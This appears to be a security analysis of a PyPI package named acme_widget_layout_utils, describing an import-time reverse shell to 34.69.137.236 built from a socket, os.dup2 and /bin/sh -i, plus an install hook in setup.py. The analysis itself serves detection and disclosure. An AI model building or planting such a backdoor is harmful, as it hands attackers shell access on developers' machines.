On first import, src/acme_widget_layout_utils/init.py (lines 13-17) opens a TCP socket to 34.69.137.236:80, duplicates stdin/stdout/stderr onto the socket via os.dup2, and execs /bin/sh -i — a textbook interactive reverse shell handing remote shell access to whoever controls 34.69.137.236. The behavior is unconditional and fires the moment any consumer runs import acme_widget_layout_utils. setup.py additionally installs a custom install command that writes /tmp/pypi_install_hook_marker.txt at install time, corroborating the package's role as a deliberately crafted attack artifact. The package name suggests benign UI/layout utilities and contains no such functionality; the pyproject.toml description openly self-identifies as a 'pentest C2 target', but the package is published on public PyPI under a generic name where any developer searching for widget/layout helpers can incidentally install and be backdoored. README's 'authorized pentest' framing does not change installer-side impact.